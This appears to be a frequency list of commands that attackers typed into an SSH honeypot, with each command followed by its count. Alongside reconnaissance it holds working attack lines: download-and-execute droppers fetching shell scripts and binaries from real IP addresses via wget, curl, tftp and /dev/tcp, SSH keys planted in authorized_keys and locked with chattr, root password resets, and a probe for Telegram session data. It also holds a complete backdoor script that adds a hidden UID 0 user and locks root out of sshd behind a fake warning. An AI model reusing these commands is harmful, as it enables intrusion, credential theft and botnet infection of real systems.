echo -e "\x6F\x6B" |
133953 |
cd ~; chattr -ia .ssh; lockr -ia .ssh |
14402 |
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ |
14397 |
uname -s -v -n -r -m |
8610 |
uname -s -v -n -r |
590 |
(nproc; uname -a) |tr '\n' '|' |
581 |
nproc ; uname -a |
581 |
cd /tmp; wget http://213.209.143.44/ssh.sh -O- |sh;curl -o http://213.209.143.44/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh;\n |
356 |
cd /tmp; wget http://5.255.121.213/gay.sh -O- |sh;curl -o http://5.255.121.213/gay.sh -O-|sh; tftp -r gay.sh -g 5.255.121.213; chmod 777 gay.sh; sh gay.sh;\n |
350 |
uname -a |
259 |
cd /tmp; wget http://107.150.0.18/ssh.sh -O- |sh;curl -o http://107.150.0.18/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh;\n |
139 |
uname -s -m |
122 |
cat /proc/cpuinfo | grep name | wc -l |
110 |
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; |
105 |
whoami |
104 |
uname -m |
103 |
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' |
102 |
crontab -l |
101 |
ls -lh $(which ls) |
100 |
which ls |
100 |
lscpu | grep Model |
100 |
df -h | head -n 2 | awk 'FNR == 2 {print $2;}' |
100 |
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' |
99 |
w |
99 |
cat /proc/cpuinfo | grep model | grep name | wc -l |
98 |
top |
98 |
uname |
98 |
/ip cloud print |
77 |
ifconfig |
77 |
cat /proc/cpuinfo |
77 |
ps | grep '[Mm]iner' |
77 |
echo Hi | cat -n |
76 |
ps -ef | grep '[Mm]iner' |
75 |
kill 1 |
68 |
ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* |
66 |
locate D877F783D5D3EF8Cs |
65 |
uname -s -v -n |
59 |
cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh; tftp -r tftp.sh -g 213.209.143.44; chmod 777 tftp.sh; sh tftp.sh |
50 |
nproc |
45 |
cd /tmp; wget http://213.209.143.44/ssh.sh -O- |sh;curl -o http://213.209.143.44/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh |
33 |
echo this_is_a_very_unique_test_string_42 > /tmp/honeypot_test_file.txt && cat /tmp/honeypot_test_file.txt && rm /tmp/honeypot_test_file.txt |
33 |
uname -a && echo "====" && cat /etc/os-release |
31 |
chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" |
28 |
echo TEST |
17 |
enable |
16 |
system |
16 |
shell |
16 |
sh |
16 |
linuxshell |
16 |
cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai |
16 |
ls |
15 |
echo 1 && cat /bin/echo |
13 |
cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh |
12 |
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* |
10 |
rm -rf no.sh; rm -rf miori.*; wget http://196.251.71.152/no.sh || curl -O http://196.251.71.152/no.sh || tftp 196.251.71.152 -c get no.sh || tftp -g -r no.sh 196.251.71.152; chmod 777 no.sh;./no.sh ssh; rm -rf no.sh |
8 |
hostname |
8 |
cd .. |
6 |
|
5 |
echo 1 && cat /bin/echoQtd#UPX! |
5 |
echo |
4 |
sudo ./upnpsetup |
4 |
./upnpsetup |
4 |
A@/~'8 |
4 |
reboot |
4 |
mkdir -p UBCClient && rm -f UBCClient/client* UBCClient/config.txt |
4 |
dir |
3 |
echo 1 > /dev/null && cat /bin/echo |
3 |
echo 1 > /dev/null && cat /bin/echoQtd#UPX! |
3 |
>>!A@/!'8ELF't{~ |
3 |
uptime |
3 |
uname -m&&pkill upnpsetup |
3 |
ls / |
3 |
echo true > ~/real.txt |
3 |
grep ^NAME= /etc/os-release | cut -d '=' -f2 | tr -d '"' | head -n1 |
3 |
cd home |
3 |
echo 'SSH check' |
2 |
history | tail -5 |
2 |
env | head -10 |
2 |
netstat -tulpn | head -10 |
2 |
sudo pkill upnpsetup |
2 |
rm ./upnpsetup |
2 |
chmod 777 ./upnpsetup |
2 |
/bin/busybox N4lRgm64 |
2 |
#!/bin/bash
username="local"
version="1.3"
if [ "$EUID" -ne 0 ]; then
echo "[-] Run as root!"
exit
fi
getent passwd $username > /dev/null
if [ $? -eq 0 ]; then
echo "[-] Username $username is already being used!"
exit
fi
echo "[+] SSH Vaccine Script v$version"
os=`lsb_release -is 2>/dev/null || echo unknown`
cpus=`lscpu 2>/dev/null | egrep "^CPU\(s\):" | sed -e "s/[^0-9]//g" || nproc 2>/dev/null || echo 0`
# Create the backdoor username.
echo "[!] Create username $username with administrator privilege."
if [ ! -d /home ]; then
mkdir /home
echo "[!] Folder /home was created."
fi
passwd=$(timeout 10 cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
h="$pwhash"
if [ -x "$(command -v openssl)" ]; then
h=$(echo $passwd | openssl passwd -1 -stdin)
else
passwd="$pw"
fi
useradd $username -o -u 0 -g 0 -c "local" -m -d /home/$username -s /bin/bash -p "$h"
if ! grep -q "^$username:" /etc/passwd;then
echo "cannot add user"
exit
fi
if [ -x "$(command -v ed)" ]; then
printf "%s\n" '$m1' wq | ed /etc/passwd -s
printf "%s\n" '$m1' wq | ed /etc/shadow -s
else
lo=$(tail -1 /etc/passwd)
sed -i "/^$username:/d" /etc/passwd
sed -i "/^root:.*:0:0:/a $lo" /etc/passwd
lo=$(tail -1 /etc/shadow)
sed -i "/^$username:/d" /etc/shadow
sed -i "/^root:/a $lo" /etc/shadow
fi
echo "[!] Generated password: $passwd"
echo "[!] Set the profile."
echo "unset HISTFILE" >> /home/$username/.bashrc
echo 'export PS1="\[$(tput setaf 2)\][\[$(tput sgr0)\]\[$(tput bold)\]\[$(tput setaf 2)\]\u@\h \W\[$(tput sgr0)\]\[$(tput setaf 2)\]]\[$(tput sgr0)\]\[$(tput bold)\]\[$(tput setaf 7)\]\\$ \[$(tput sgr0)\]"' >> /home/$username/.bashrc
echo "w" >> /home/$username/.bashrc
echo "################################################################################"
echo "#######################################################################" > /tmp/sshd_config_tmp
echo "# ! ! ! ! ! IMPORTANT ! ! ! ! ! #" >> /tmp/sshd_config_tmp
echo "# * Your system has detected a weak password for root account and for #" >> /tmp/sshd_config_tmp
echo "# security reasons, remote access via SSH has been blocked to prevent #" >> /tmp/sshd_config_tmp
echo "# unauthorized access. In order to enable again remote access to this #" >> /tmp/sshd_config_tmp
echo "# machine for root user via SSH, set a new complex password for root #" >> /tmp/sshd_config_tmp
echo "# account and delete 'DenyUsers root' line below on this config file. #" >> /tmp/sshd_config_tmp
echo "# * Restarting the SSH Daemon is required for changes to take effect. #" >> /tmp/sshd_config_tmp
echo "# #" >> /tmp/sshd_config_tmp
echo "# Bash commands: #" >> /tmp/sshd_config_tmp
echo "# passwd root (Changes your root password). #" >> /tmp/sshd_config_tmp
echo "# service sshd restart (Restart the SSH Daemon). #" >> /tmp/sshd_config_tmp
echo "DenyUsers root" >> /tmp/sshd_config_tmp
echo "#######################################################################" >> /tmp/sshd_config_tmp
cat /etc/ssh/sshd_config >> /tmp/sshd_config_tmp
yes | cp /tmp/sshd_config_tmp /etc/ssh/sshd_config > /dev/null 2>&1
rm -rf /tmp/sshd_config_tmp
systemctl restart ssh || systemctl restart sshd || service ssh restart || service sshd restart || /etc/init.d/ssh restart || /etc/init.d/sshd restart
if [ $? -eq 0 ];then
echo "SSHD restarted"
else
echo "SSHD error"
fi
ip=$ip
echo "[!] IP: $ip"
# Try to get a hostname from IP.
dns=`getent hosts $ip | awk '{print $2}'`
if [ -z "$dns" ]
then
dns=null
fi
echo "[!] DNS: $dns"
# Get country name from IP.
country=`wget -qO- https://api.db-ip.com/v2/free/$ip/countryName 2>/dev/null || curl -ks -m30 https://api.db-ip.com/v2/free/$ip/countryName 2>/dev/null || echo X`
echo "[!] List of usernames on this machine:"
ls /home | awk '{print $1}'
echo "[!] List of ethernet IP addresses:"
ip addr show | grep -o "inet [0-9]*\.[0-9]*\.[0-9]*\.[0-9]*" | grep -o "[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*"
echo "################################################################################"
# Print all info necessary about the machine.
echo ""
uname -a
echo "$username $passwd $h"
echo "$ip,$dns,root,$username,$passwd,$cpus,$os,$country"
echo ""
echo "################################################################################"
|
2 |
lsb_release -is 2 > /dev/null || echo unknown |
2 |
lscpu 2 > /dev/null | egrep ^CPU\(s\ |
2 |
>D6@/XJ'8 |
2 |
cat /proc/cpuinfo | egrep name | wc |
2 |
lsb_release -ds 2>/dev/null || cat /etc/os-release 2>/dev/null | grep PRETTY_NAME | cut -d '"' -f 2 |
2 |
echo ok |
2 |
ifconfig || ip a |
2 |
ping;sh;cd /tmp; wget http://213.209.143.44/ssh.sh -O- |sh;curl -o http://213.209.143.44/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh |
2 |
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 185.236.24.192/x; curl -O 185.236.24.192/x; chmod 777 x; sh x; rm -rf x; rm -rf x |
2 |
nano |
2 |
echo "root:99yo9IAMcOTr"|chpasswd|bash |
1 |
echo "root:LOUfNH3pXATG"|chpasswd|bash |
1 |
echo "root:H1kNgdQNQPfK"|chpasswd|bash |
1 |
echo "root:T4hCERNnJDMZ"|chpasswd|bash |
1 |
nohup bash -c "exec 6<>/dev/tcp/8.219.240.121/60114 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/2ifWd4qMrk && chmod +x /tmp/2ifWd4qMrk && /tmp/2ifWd4qMrk iZZaZXJUjomBmUN5f1uajoiRXXhrVY6KiZlDenxdjoyLmlt7el6YmICOX3pyQ5KMiI5ceXpXloiJkVlrc0OSiYGOXH95Q5eMgpZdentcgIyPjl94c0ORi4uOX357V5aIiZJda39ajoqLmEN5eF+OiomSV317XJCImJReZXpekZaKklVlfVuajoiRWXhrWZOWiZJVZXpYkJaKkFtxfV2RjIyAWXxlVZOWiplDeXpVmo6IkVl7a1mXloqTWmV6XpiWipJacX1dkYiKgFx7eEORiImOXH54Q5KPgpZdentdgOOKlF0vcQuaiomUXXF/DpCIgsQJKClXl4mJl1d5fl/Dgo+YX30WV5aIiZRbO7vsQgmBG4MI" & |
1 |
dd bs=1 count=1911588 > /tmp/0JSDKEuF6I |
1 |
echo "root:OU84qisyZDRh"|chpasswd|bash |
1 |
chmod +x ./.5191166190931151657/sshd;nohup ./.5191166190931151657/sshd 34.122.156.88 170.84.39.236 196.57.217.2 185.22.155.56 41.216.189.181 221.2.109.10 198.154.88.54 103.145.145.76 167.114.180.31 47.79.147.66 101.91.181.235 115.231.181.61 120.79.95.224 212.127.78.66 8.217.13.52 221.130.136.44 210.46.216.173 8.138.178.0 111.38.234.13 148.72.168.29 45.133.194.124 175.47.180.25 160.202.248.51 163.172.34.113 178.128.39.137 185.105.116.131 37.59.97.82 36.138.228.99 117.50.184.156 47.94.87.144 77.239.111.190 223.75.204.39 103.232.21.226 103.185.52.34 217.11.166.120 61.169.146.123 31.14.115.8 45.251.115.48 111.12.131.236 152.42.211.226 116.62.60.152 117.68.104.171 41.216.189.248 220.67.128.33 112.217.86.2 171.244.22.39 115.190.97.236 103.186.97.118 220.181.172.244 35.78.180.133 47.94.158.98 & |
1 |
echo "root:vBPcs4HF3zIX"|chpasswd|bash |
1 |
echo "root:kgXTJn9lXEiF"|chpasswd|bash |
1 |
echo "root:FhMY6hPOjc22"|chpasswd|bash |
1 |
echo "root:6nX2y8ECMZO3"|chpasswd|bash |
1 |
echo "root:MEvjkCaedKen"|chpasswd|bash |
1 |
echo "root:idxvY5qKgUmP"|chpasswd|bash |
1 |
echo "root:m5GWF2eybbzj"|chpasswd|bash |
1 |
nohup $SHELL -c "curl http://47.239.42.214:60123/linux -o /tmp/DhjcNkNETh; if [ ! -f /tmp/DhjcNkNETh ]; then wget http://47.239.42.214:60123/linux -O /tmp/DhjcNkNETh; fi; if [ ! -f /tmp/DhjcNkNETh ]; then exec 6<>/dev/tcp/47.239.42.214/60123 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/DhjcNkNETh ; chmod +x /tmp/DhjcNkNETh && /tmp/DhjcNkNETh t6NRIX0Cjc/gN+XPjgV/NV+zy8uySTt4Ho3U5S7g04kedjZTtcrLs1kveweR0+Uy/9OMBWE+WbXAzLNYPnkQi9b/MuLXkQJ7Nke7y8C1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OKAmE+WK3MyrlfP34CicHlN//TjAlhN1mty8uwUzl/AYzR8TTmz40DeSFbs9TOulM5fwGN0fEx6NORA2E2W63CzblfP34Ai8HlN//TjAdhPlux1Mu2XDV5AI7T6SDl1pECfDZHt8jUsVg7dQaP0OMz8dWIHnc5R7LNza1YO3oKidHgMOLBiwdhN1qtyMqwRz53A4XX4THi2Z8EeCFbsM3UsFkhfgCI2+cw4NONEHs4R7HJza1ROWEBh9frNuHQiwdvPlmy1MuxXyF+BpHT4Dbr148BfDhJt83UsV08YQGN1v8x5dGFBn8+XbDayLNeIX4Ij8/jMePPjgZ1OVmyzsmjXThhAovS/zHj1pEBez9TtcrLt1ovfgCOz+Ay58+OBmE9WLXAzLNYPHgQi9b/MuLYkQR9IVuyzsC1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OMCWE3Wa3Ly7BTOX8BjNHxNObPjQN5IVuz1M66Uzl/AY3R8TTmz40DeCFYscjUslw6dQaP0OM48deJHn0/X63Jw61dPXUGj9DhM/HViB59O1utyMm2Rz5/BoXX4THg158Bdj1HsNTDsUc3eAqJ0eAw5cGLB2E9WrXUyLdQIXcBhdfhMePSnwR9IVi6ztSyXT5hAovT6zbh0I0Bo5/QGLu0ZWn54CiI2oT0F7kcWQgb; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/DhjcNkNETh && /tmp/DhjcNkNETh t6NRIX0Cjc/gN+XPjgV/NV+zy8uySTt4Ho3U5S7g04kedjZTtcrLs1kveweR0+Uy/9OMBWE+WbXAzLNYPnkQi9b/MuLXkQJ7Nke7y8C1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OKAmE+WK3MyrlfP34CicHlN//TjAlhN1mty8uwUzl/AYzR8TTmz40DeSFbs9TOulM5fwGN0fEx6NORA2E2W63CzblfP34Ai8HlN//TjAdhPlux1Mu2XDV5AI7T6SDl1pECfDZHt8jUsVg7dQaP0OMz8dWIHnc5R7LNza1YO3oKidHgMOLBiwdhN1qtyMqwRz53A4XX4THi2Z8EeCFbsM3UsFkhfgCI2+cw4NONEHs4R7HJza1ROWEBh9frNuHQiwdvPlmy1MuxXyF+BpHT4Dbr148BfDhJt83UsV08YQGN1v8x5dGFBn8+XbDayLNeIX4Ij8/jMePPjgZ1OVmyzsmjXThhAovS/zHj1pEBez9TtcrLt1ovfgCOz+Ay58+OBmE9WLXAzLNYPHgQi9b/MuLYkQR9IVuyzsC1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OMCWE3Wa3Ly7BTOX8BjNHxNObPjQN5IVuz1M66Uzl/AY3R8TTmz40DeCFYscjUslw6dQaP0OM48deJHn0/X63Jw61dPXUGj9DhM/HViB59O1utyMm2Rz5/BoXX4THg158Bdj1HsNTDsUc3eAqJ0eAw5cGLB2E9WrXUyLdQIXcBhdfhMePSnwR9IVi6ztSyXT5hAovT6zbh0I0Bo5/QGLu0ZWn54CiI2oT0F7kcWQgb" & |
1 |
head -c 3610344 > /tmp/fNkeZdTvRQ |
1 |
nohup $SHELL -c "curl http://47.239.42.214:60123/linux -o /tmp/tGt8tARgEl; if [ ! -f /tmp/tGt8tARgEl ]; then wget http://47.239.42.214:60123/linux -O /tmp/tGt8tARgEl; fi; if [ ! -f /tmp/tGt8tARgEl ]; then exec 6<>/dev/tcp/47.239.42.214/60123 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/tGt8tARgEl ; chmod +x /tmp/tGt8tARgEl && /tmp/tGt8tARgEl t6NRIX0Cjc/gN+XPjgV/NV+zy8uySTt4Ho3U5S7g04kedjZTtcrLs1kveweR0+Uy/9OMBWE+WbXAzLNYPnkQi9b/MuLXkQJ7Nke7y8C1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OKAmE+WK3MyrlfP34CicHlN//TjAlhN1mty8uwUzl/AYzR8TTmz40DeSFbs9TOulM5fwGN0fEx6NORA2E2W63CzblfP34Ai8HlN//TjAdhPlux1Mu2XDV5AI7T6SDl1pECfDZHt8jUsVg7dQaP0OMz8dWIHnc5R7LNza1YO3oKidHgMOLBiwdhN1qtyMqwRz53A4XX4THi2Z8EeCFbsM3UsFkhfgCI2+cw4NONEHs4R7HJza1ROWEBh9frNuHQiwdvPlmy1MuxXyF+BpHT4Dbr148BfDhJt83UsV08YQGN1v8x5dGFBn8+XbDayLNeIX4Ij8/jMePPjgZ1OVmyzsmjXThhAovS/zHj1pEBez9TtcrLt1ovfgCOz+Ay58+OBmE9WLXAzLNYPHgQi9b/MuLYkQR9IVuyzsC1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OMCWE3Wa3Ly7BTOX8BjNHxNObPjQN5IVuz1M66Uzl/AY3R8TTmz40DeCFYscjUslw6dQaP0OM48deJHn0/X63Jw61dPXUGj9DhM/HViB59O1utyMm2Rz5/BoXX4THg158Bdj1HsNTDsUc3eAqJ0eAw5cGLB2E9WrXUyLdQIXcBhdfhMePSnwR9IVi6ztSyXT5hAovT6zbh0I0Bo5/QGLu0ZWn54CiI2oT0F7kcWQgb; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/tGt8tARgEl && /tmp/tGt8tARgEl t6NRIX0Cjc/gN+XPjgV/NV+zy8uySTt4Ho3U5S7g04kedjZTtcrLs1kveweR0+Uy/9OMBWE+WbXAzLNYPnkQi9b/MuLXkQJ7Nke7y8C1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OKAmE+WK3MyrlfP34CicHlN//TjAlhN1mty8uwUzl/AYzR8TTmz40DeSFbs9TOulM5fwGN0fEx6NORA2E2W63CzblfP34Ai8HlN//TjAdhPlux1Mu2XDV5AI7T6SDl1pECfDZHt8jUsVg7dQaP0OMz8dWIHnc5R7LNza1YO3oKidHgMOLBiwdhN1qtyMqwRz53A4XX4THi2Z8EeCFbsM3UsFkhfgCI2+cw4NONEHs4R7HJza1ROWEBh9frNuHQiwdvPlmy1MuxXyF+BpHT4Dbr148BfDhJt83UsV08YQGN1v8x5dGFBn8+XbDayLNeIX4Ij8/jMePPjgZ1OVmyzsmjXThhAovS/zHj1pEBez9TtcrLt1ovfgCOz+Ay58+OBmE9WLXAzLNYPHgQi9b/MuLYkQR9IVuyzsC1WT59A5/V5i7j0ogedz9Hss7KuV8/fgKJweU3/9OMCWE3Wa3Ly7BTOX8BjNHxNObPjQN5IVuz1M66Uzl/AY3R8TTmz40DeCFYscjUslw6dQaP0OM48deJHn0/X63Jw61dPXUGj9DhM/HViB59O1utyMm2Rz5/BoXX4THg158Bdj1HsNTDsUc3eAqJ0eAw5cGLB2E9WrXUyLdQIXcBhdfhMePSnwR9IVi6ztSyXT5hAovT6zbh0I0Bo5/QGLu0ZWn54CiI2oT0F7kcWQgb" & |
1 |
head -c 3610344 > /tmp/q7lqdFpJSp |
1 |
echo "root:FZZ51hEgqjqg"|chpasswd|bash |
1 |
nohup $SHELL -c "curl http://47.254.126.99:60100/linux -o /tmp/QHgdhFujzD; if [ ! -f /tmp/QHgdhFujzD ]; then wget http://47.254.126.99:60100/linux -O /tmp/QHgdhFujzD; fi; if [ ! -f /tmp/QHgdhFujzD ]; then exec 6<>/dev/tcp/47.254.126.99/60100 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/QHgdhFujzD ; chmod +x /tmp/QHgdhFujzD && /tmp/QHgdhFujzD ssYBGdR4f84ABNTJ0d8MFMx6e8oeFd7RzdQHAMt9ftQfANbFydYEH8tqctQcBN/RztMEAMt8fcAYBdfLy8YBGdR4fskABNTI0dcBHsB8essaBsbLyMgHG8hkec8ADNbFydYEHM1qctQcBNHRzdcbH81/cMweBNbG39ICAMJ8ZMsZA8jKz9wDHst+f9oaAsjNzN8bFspke8sdD9DPztUFDsJkeMseG9PP0dAAFMx6e8gYFdfGzcgGAMN4ZMIZD9DPztYBDsx8ZMgeA8jMxsgBHMB8esseBsbH0dcBHtR4ec4ABNXJxdAFH8p/as4ZG9HJ0dADAMh7cMweBNbJ39ICAMh+edQcBsjMx9wDHst5fdoaAsjNzNEbFsxke8IYD9DPztICDs59ZMgdA8jNy9UbH855cMweBNbN39ICAMh5c9QfBdXRx9wDHst+etoaAsjNy9QbH8xkeMoUA9bOy9IVGs1kcskAB9bG0d4MFMx6e8kfFdXJ0dcGGtR7c84ABN/FydYEGs1qfs0ADdXRzdYMAMt6c8AYBdfPz8YNAMh7ctQfB9PRzdYHFMx6e84ZFdTOzsgEGsNke8weG9TOy9wDHst+ctoaAsjNytQbH8tkfMoUA9bOzdAVGs1keMkZG9XP0dcFGcB8esscB8bLyMgEH8tke8gbG9PNxdAFH8h+as4ZG97M0dcHGtR7eMsUA9bOz9MVH8p7ZMscA8jOycgHH8xwfMofBtHfy9EbHMl8ZMgeG9LGxdAFH8h6lkiMtAS/9f6aua5pMj4=; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/QHgdhFujzD && /tmp/QHgdhFujzD ssYBGdR4f84ABNTJ0d8MFMx6e8oeFd7RzdQHAMt9ftQfANbFydYEH8tqctQcBN/RztMEAMt8fcAYBdfLy8YBGdR4fskABNTI0dcBHsB8essaBsbLyMgHG8hkec8ADNbFydYEHM1qctQcBNHRzdcbH81/cMweBNbG39ICAMJ8ZMsZA8jKz9wDHst+f9oaAsjNzN8bFspke8sdD9DPztUFDsJkeMseG9PP0dAAFMx6e8gYFdfGzcgGAMN4ZMIZD9DPztYBDsx8ZMgeA8jMxsgBHMB8esseBsbH0dcBHtR4ec4ABNXJxdAFH8p/as4ZG9HJ0dADAMh7cMweBNbJ39ICAMh+edQcBsjMx9wDHst5fdoaAsjNzNEbFsxke8IYD9DPztICDs59ZMgdA8jNy9UbH855cMweBNbN39ICAMh5c9QfBdXRx9wDHst+etoaAsjNy9QbH8xkeMoUA9bOy9IVGs1kcskAB9bG0d4MFMx6e8kfFdXJ0dcGGtR7c84ABN/FydYEGs1qfs0ADdXRzdYMAMt6c8AYBdfPz8YNAMh7ctQfB9PRzdYHFMx6e84ZFdTOzsgEGsNke8weG9TOy9wDHst+ctoaAsjNytQbH8tkfMoUA9bOzdAVGs1keMkZG9XP0dcFGcB8esscB8bLyMgEH8tke8gbG9PNxdAFH8h+as4ZG97M0dcHGtR7eMsUA9bOz9MVH8p7ZMscA8jOycgHH8xwfMofBtHfy9EbHMl8ZMgeG9LGxdAFH8h6lkiMtAS/9f6aua5pMj4=" & |
1 |
head -c 0 > /tmp/1PLVmyNT2b |
1 |
nohup $SHELL -c "curl http://101.126.16.216:60137/linux -o /tmp/u1rwXJHd7r; if [ ! -f /tmp/u1rwXJHd7r ]; then wget http://101.126.16.216:60137/linux -O /tmp/u1rwXJHd7r; fi; if [ ! -f /tmp/u1rwXJHd7r ]; then exec 6<>/dev/tcp/101.126.16.216/60137 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/u1rwXJHd7r ; chmod +x /tmp/u1rwXJHd7r && /tmp/u1rwXJHd7r yTccp39jpRw5tbYhBqloa6YYJrS0NxC+Y2OiBiazsDkZpWFrphgmtbU3EL5gYqMGJKq2JR+qZ2GhHCakvDkaoWF/oRolqrUlHapnYaEcLqS3IQaiYGO+GSW9qiUeqmdhoRgipLAgBqJiab4aLqq2IhyqZ2GhGSSksCAGqGd/oR8gqrUjHapnYaEYJKSwIAaoZ3+lBiazsi0eoGBgpAgkvaomGql/YKMbOby9LR6gYGGlCCOzqiUco39gpQYlt70tHqBgYKIIJrS1ORmiZ3+hHjm2tSESpmFgox83sLc5GqRpf6cQOba1JhKmYWCgGje1siIGoWRlvhoksaomGaZrZ6AZJbekJhqkf2OiHTm1tiUGoWRoqh4ntbYvCKRmf6IcJaq1JRC+Y2OqHie1tSQIpGZ/oh0mqrwjBqFkZ6oeJ7W0IgijZ3+hGySqtSYYvmNioxIhtLUnGbBlZr4QJKq1JRy+YGOhEiG0tScdsGVivhojvKogEL5jYaUSIbS1JB+waWm+ECeqtSQdvmVmqh4ntbclCKRmf6EZLqq3IwahYmmqHie1tyIIpGJ/ohwvqrMvBqJhZaoeJ7W1JgikZn+iHCWqtiQdvmBhphIhtLUmHrBlZr4aIraqJhm+Z2GqHie1tiEIpGZ/oRonqrEiBqNoa6YYJrC2Nxumf2OhGjm1ti4GomdrphgmtLE3HKd/aaYGJaq1IxGqZ2GhGiWksCAGomVjvh4kqrIvEqZhYKEeN7yqJhygf2KjBiWxti0eoGBhpQgjs6ogHr5nZ74aJr6yJxmgZ0E3WYF0JRFxIMUoIg==; fi; echo password > /tmp/.opass; chmod +x /tmp/u1rwXJHd7r && /tmp/u1rwXJHd7r yTccp39jpRw5tbYhBqloa6YYJrS0NxC+Y2OiBiazsDkZpWFrphgmtbU3EL5gYqMGJKq2JR+qZ2GhHCakvDkaoWF/oRolqrUlHapnYaEcLqS3IQaiYGO+GSW9qiUeqmdhoRgipLAgBqJiab4aLqq2IhyqZ2GhGSSksCAGqGd/oR8gqrUjHapnYaEYJKSwIAaoZ3+lBiazsi0eoGBgpAgkvaomGql/YKMbOby9LR6gYGGlCCOzqiUco39gpQYlt70tHqBgYKIIJrS1ORmiZ3+hHjm2tSESpmFgox83sLc5GqRpf6cQOba1JhKmYWCgGje1siIGoWRlvhoksaomGaZrZ6AZJbekJhqkf2OiHTm1tiUGoWRoqh4ntbYvCKRmf6IcJaq1JRC+Y2OqHie1tSQIpGZ/oh0mqrwjBqFkZ6oeJ7W0IgijZ3+hGySqtSYYvmNioxIhtLUnGbBlZr4QJKq1JRy+YGOhEiG0tScdsGVivhojvKogEL5jYaUSIbS1JB+waWm+ECeqtSQdvmVmqh4ntbclCKRmf6EZLqq3IwahYmmqHie1tyIIpGJ/ohwvqrMvBqJhZaoeJ7W1JgikZn+iHCWqtiQdvmBhphIhtLUmHrBlZr4aIraqJhm+Z2GqHie1tiEIpGZ/oRonqrEiBqNoa6YYJrC2Nxumf2OhGjm1ti4GomdrphgmtLE3HKd/aaYGJaq1IxGqZ2GhGiWksCAGomVjvh4kqrIvEqZhYKEeN7yqJhygf2KjBiWxti0eoGBhpQgjs6ogHr5nZ74aJr6yJxmgZ0E3WYF0JRFxIMUoIg==" & |
1 |
head -c 3815748 > /tmp/jDPRVkOxMp |
1 |
